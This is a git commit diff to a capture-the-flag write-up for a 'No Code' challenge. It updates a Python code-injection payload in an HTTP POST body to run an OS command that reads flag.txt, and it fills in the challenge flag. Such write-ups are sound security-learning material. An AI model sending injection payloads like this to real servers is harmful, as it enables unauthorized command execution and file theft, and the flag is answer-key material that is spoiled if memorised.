feat: added flag for No Code challs

pull/15/head
daffainfo 2024-01-15 18:14:33 +07:00
parent 137d00865e
commit d113273f26
2 changed files with 3 additions and 3 deletions

View File

@ -39,12 +39,12 @@ Content-Type: application/x-www-form-urlencoded
Content-Length: 15
code=
__import__("os").system("ls")
__import__("os").popen("cat flag.txt").read()
```
> Since I can't access the website again, I will leave this writeup without the actual flag
![flag](images/flag.png)
## Flag
```
-
uoftctf{r3g3x_3p1c_f41L_XDDD}
```

Binary file not shown.

After

Width:  |  Height:  |  Size: 107 KiB